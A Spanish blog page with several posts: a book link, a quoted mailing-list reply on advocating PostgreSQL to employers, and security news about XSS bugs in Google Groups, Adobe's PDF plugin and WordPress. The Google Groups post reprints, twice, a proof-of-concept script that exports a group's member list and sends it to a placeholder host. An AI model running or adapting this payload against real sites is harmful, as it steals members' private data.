Si les interesa la programación multihebra, seguramente el siguiente libro, disponible en versión HTML y PDF, les será de utilidad.
Categories
Sobre Software Libre
Mientras hacía una limpieza de mi buzón de correo, encontré un mensaje -con casi un año de antigüedad- que vale la pena mostrarlo:
>lo que
> quiero es demostrar la potencia de PostgreSQL en la empresa donde
> trabajo y creo que usar PostgreSQL para solucionar este gran problema
> hará que la visión de mis jefes acerca del software libre cambie
> radicalmente.Toda vez que escoges usar software libre en lugar de software privativo
estas haciendo un compromiso. Por un lado tienes la posibilidad de usar
el software sin pagar, mirar el codigo, modificarlo de ser necesario,
etc. Pero tambien adquieres varios costos. Por ej. no dispones de un
telefono gratis al cual puedas llamar para solucionar tus problemas; las
cosas pueden ser mas arcanas para instalar o configurar; las respuestas
a preguntas de soporte no vendran en un manual, y pueden resultarte
desagradablemente planteadas. (No es adorable cuando una bonita
vendedora te dice con sus labios delicados o carnosos, segun tu
preferencia: "ah, pero por supuesto que Ud. puede hacer esto; solo tiene
que desembolsar otros us$2000 para obtener la nueva version de nuestro
producto". Que desagradable cuando en cambio un bruto en una lista de
correo te indica que si perdiste datos es porque "eres un idiota,
debiste hacer upgrade hace meses")Cuando alguien me habla de "cambiar la vision de alguien radicalmente" a
mi me da una especie de temor de que el proyecto fracase por chocar con
el escepticismo natural de la gente, sobre todo los jefes; sobre todo
los jefes convencidos de que en el patio de al lado el pasto es mas
verde. Tengo la impresion de que dentro de un mes vas a estar pidiendo
ayuda "urgente" porque "este proyecto se ha arrastrado demasiado tiempo
y no ha dado frutos", porque "me van a echar del trabajo", porque "van a
comprar MS SQL Server", etc etc. Hemos visto eso aqui.En resumen, ten cuidado con lo que propones hacer con una herramienta
que no conoces. Puede que sea cierto que PostgreSQL "no se la puede" en
el escenario que quieres manejar. Y si toda la opinion de tus jefes
depende de eso, puede resultar que la presion te resulte poco grata.
Categories
Otro bug, de la mano de Google
Este año recién empieza y ya se han reportado múltiples fallos de seguridad en diversas aplicaciones, esta vez Michael Schwarz comenta sobre un bug en Google Groups, que permite insertar javascript en el mensaje que se envía al administrador del grupo al momento de suscribirse.
En el mismo artículo, pone código de prueba que permite obtener la lista de miembros de un grupo X.
javascript:
<script type="text/javascript">
var xmlhttp = new XMLHttpRequest();
xmlhttp.open("GET", "/group/[GROUPNAME]/manage_members/MemberList.csv?Action.Export=Export+member+list", true);
xmlhttp.onreadystatechange = function () {
if (xmlhttp.readyState == 4) {
var img = document.createElement("img");
img.src = "http://yourdomain/?" + escape(xmlhttp.responseText);
document.body.appendChild(img);
}
};
xmlhttp.send(null);
</script>
var xmlhttp = new XMLHttpRequest();
xmlhttp.open("GET", "/group/[GROUPNAME]/manage_members/MemberList.csv?Action.Export=Export+member+list", true);
xmlhttp.onreadystatechange = function () {
if (xmlhttp.readyState == 4) {
var img = document.createElement("img");
img.src = "http://yourdomain/?" + escape(xmlhttp.responseText);
document.body.appendChild(img);
}
};
xmlhttp.send(null);
</script>
Hace algunas horas, Stefan Esser comentaba un bug, descubierto por Stefano Di Paola, en el plugin para PDF de Adobe, que permite realizar ataques XSS a cualquier sitio que contenga documentos PDF.
Sugieren deshabilitar este plugin para evitar problemas.
El código mostrado en el último quiz, en realidad es una función de WordPress que era vulnerable a XSS. Pongo la solución en una nueva entrada porque intentaré describir algunos de los errores que cometí al intentar explotar el bug mencionado en una entrada anterior.